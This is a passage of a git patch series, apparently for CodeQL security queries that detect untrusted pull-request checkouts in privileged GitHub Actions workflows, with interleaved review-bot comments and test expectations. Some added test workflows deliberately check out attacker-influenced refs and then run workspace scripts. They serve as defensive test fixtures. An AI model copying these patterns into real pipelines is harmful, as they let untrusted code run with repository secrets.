${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 42d4bb577c84d021f2cca923552f647f9288ff0f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:11 +0200 Subject: [PATCH 0609/1267] Better identification of checkout of untrusted code depending on the triggering events --- .../codeql/actions/dataflow/FlowSources.qll | 6 +- .../security/OutputClobberingQuery.qll | 3 +- .../actions/security/PoisonableSteps.qll | 7 +- .../security/UntrustedCheckoutQuery.qll | 227 ++++++++---------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../CWE-829/.github/workflows/test21.yml | 27 +++ .../CWE-829/.github/workflows/test22.yml | 62 +++++ .../CWE-829/.github/workflows/test23.yml | 47 ++++ .../UntrustedCheckoutCritical.expected | 3 + .../CWE-829/UntrustedCheckoutHigh.expected | 4 - .../CWE-829/UntrustedCheckoutMedium.expected | 7 - 11 files changed, 250 insertions(+), 144 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 56c901434ce..e0d46c7196d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -90,7 +90,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout 
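Review bot: The condition identifying an untrusted `actions/checkout` step (`getCallee() = "actions/checkout"`, a `ref` argument present, `ref` not matching `%base%`, and now the `checkoutTriggers()` check) is repeated verbatim in `GitCommandSource` here, in `CheckoutSource` later in this file, and in `OutputClobberingFromFileReadSink` in OutputClobberingQuery.qll. Each copy has to be kept in sync by hand, and a missed copy would leave one source or sink with a different notion of which workflows are privileged. Holding the condition once in a shared predicate, for example `predicate isUntrustedRefCheckout(UsesStep uses)` (the name is only a suggestion), would remove that risk. The enclosing characteristic predicates start and end outside these hunks.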
@@ -237,7 +238,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { this.asExpr() = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 311c3abdb69..5850aa91e6e 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -29,7 +29,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 99d844bae79..d446c446641 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -17,12 +17,13 @@ class PoisonableCommandStep extends PoisonableStep, Run { class JavascriptImportUsesStep extends PoisonableStep, UsesStep { JavascriptImportUsesStep() { - exists(string script, string line, string import_stmt | + exists(string script, string line | this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and - import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and - import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + // const script = require('${{ github.workspace }}/scripts/test.js'); + // await script({ github, context, core }); + line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 336afdc73b1..621f4b80e1f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
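Review bot: The new pattern `.*(import|require)\\b.*github.workspace\\b.*` has no word boundary before the keyword and leaves the `.` in `github.workspace` unescaped, so it accepts any line where a word ending in `import` or `require` is followed somewhere by text such as `github_workspace`. The previous version required `await import(...)` around the path, so precision drops by more than the added `require` case needs. A tighter form is `line.regexpMatch(".*\\b(import|require)\\b.*\\bgithub\\.workspace\\b.*")`. The two example lines added inside the `exists` body would read better as QLDoc on `JavascriptImportUsesStep`, e.g. `/** A github-script step that imports or requires a file from the workspace. */`.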
@@ -3,49 +3,57 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + /** * A taint-tracking configuration for PR HEAD references flowing * into actions/checkout's ref argument. */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - // remote flow sources - source instanceof ArtifactSource - or - source instanceof GitHubCtxSource - or - source instanceof GitHubEventCtxSource - or - source instanceof GitHubEventJsonSource - or - source instanceof MaDSource - or - // `ref` argument contains the PR id/number or head ref - exists(Expression e | - source.asExpr() = e and - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) + source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + ( + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) ) - ) - or - // 3rd party actions returning the PR head ref - exists(StepsExpression e, UsesStep step | - source.asExpr() = e and - e.getStepId() = step.getId() and - ( - step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" - or - step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "gotson/pull-request-comment-branch" and 
e.getFieldName() = "head_ref" - or - step.getCallee() = "potiuk/get-workflow-origin" and - e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] - or - step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) ) ) } 
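Review bot: `checkoutTriggers()` is added as a public predicate with no QLDoc, yet after this commit it decides which workflows can produce an untrusted-checkout source at all: a job whose triggers are all outside the four listed names no longer yields a source in `isSource`. The list deserves a doc comment stating why these events are treated as privileged and that other events are deliberately ignored, e.g. `/** Gets the name of a trigger event whose workflows run with privileges while handling attacker-influenced refs. */`. Because the guard uses `getATriggerEvent()`, one listed trigger among several is enough to match, which is worth stating too. It is also worth confirming how `source.asExpr().getEnclosingJob()` behaves for expressions in composite actions, since a source with no enclosing job would presumably be dropped by the new conjunct.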
@@ -71,27 +79,32 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global> $GITHUB_OUTPUT + if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i patch) + else + if [[ $OLD_VERSION == *"rc"* ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease) + else + # WordPress version guidelines: If minor is 9, bump major instead. + IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION" + if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then + NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1" + else + NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1" + fi + fi + fi + echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT + IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION" + RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}" + echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT + + build: + runs-on: ubuntu-latest + needs: bump-version + if: | + always() && ( + github.event_name == 'pull_request' || + github.event_name == 'workflow_dispatch' || + github.repository == 'test/test' + ) + steps: + - name: Checkout code + uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} + + - run: ./bin/build-plugin-zip.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml new file mode 100644 index 00000000000..da889dd2ac6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml 
@@ -0,0 +1,47 @@ +on: + schedule: + - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC + workflow_dispatch: + inputs: + pr: + description: "PR Number" + required: false + type: number + release: + types: [ published ] + +jobs: + resolve-required-data: + name: Resolve Required Data + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + outputs: + ref: ${{ steps.script.outputs.ref }} + steps: + - name: Resolve and set checkout and version data to use for release + id: script + uses: actions/github-script@v7 + env: + PR_NUMBER: ${{ github.event.inputs.pr }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js'); + await script({ github, context, core }); + + build: + needs: [ resolve-required-data ] + if: ${{ github.repository_owner == 'test' }} + name: stable + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ needs.resolve-required-data.outputs.repo }} + ref: ${{ needs.resolve-required-data.outputs.ref }} + + - name: Build + shell: bash + run: | + ./cmd + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 237928fc892..339cd5f6cf4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -267,6 +267,9 @@ edges | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | | .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 13e16280c33..1d6122b3747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index c81666f72dc..a476bdc22d8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -1,13 +1,6 @@ -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 0cacb6feaffba0b5317ecb3829d657b3ba89371b Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:51 +0200 Subject: [PATCH 0610/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 867f1bfdb86..404c86d212c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.71 +version: 0.1.72 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index df650d0e242..1296bbd667b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.71 +version: 0.1.72 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0738a66380d8f781114441348d0713c090c30d5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:37:01 +0200 Subject: [PATCH 0611/1267] Add trigger event checks for all checkout models --- .../security/UntrustedCheckoutQuery.qll | 4 + .../CWE-829/.github/workflows/test24.yml | 20 + .../CWE-829/UntrustedCheckoutCritical.actual | 342 ++++++++++++++++++ 3 files changed, 366 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 621f4b80e1f..ea3f4c3c269 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -283,6 +283,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -306,6 +307,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -326,6 +328,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -348,6 +351,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml new file mode 100644 index 00000000000..8502d081a73 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml 
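Review bot: The added trigger conjunct sits inside `exists(string cmd | ...)` in `GitMutableRefCheckout` although it does not mention `cmd`; the same placement is repeated in `GitSHACheckout`, `GhMutableRefCheckout` and `GhSHACheckout` in the following hunks. Moving `this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers()` in front of the `exists` would make it clear that the event check is a property of the step, not of an individual command. All four characteristic predicates continue past the end of their hunks.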
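Review bot: In `GhSHACheckout` the command pattern is `gh\\s+pr\\s+checkout.*`, while `GhMutableRefCheckout` in the previous hunk uses `.*(gh|hub)\\s+pr\\s+checkout.*`. `regexpMatch` has to match the whole string, so the SHA variant only recognises commands that begin with `gh` and never `hub`, and a checkout preceded by anything else in the command is not modelled. Unless the difference is intentional, use the same pattern in both: `cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and`. The predicate body continues outside the hunk.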
@@ -0,0 +1,20 @@ +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + if: github.event_name == 'pull_request' + steps: + - name: Check out repository code + uses: actions/checkout@v2 + + - name: Fetch base and head on PR + if: ${{ github.event.pull_request.base.sha }} + run: | + git fetch origin master ${{ github.event.pull_request.base.sha }} + git fetch origin master ${{ github.event.pull_request.head.sha }} + + - name: Check that Pull Request includes updating the Version + run: | + git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py + git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py + python scripts/version_update_check.py tv0 tv1 diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual new file mode 100644 index 00000000000..1ed39f73a48 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual 
@@ -0,0 +1,342 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | 
.github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| 
.github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| 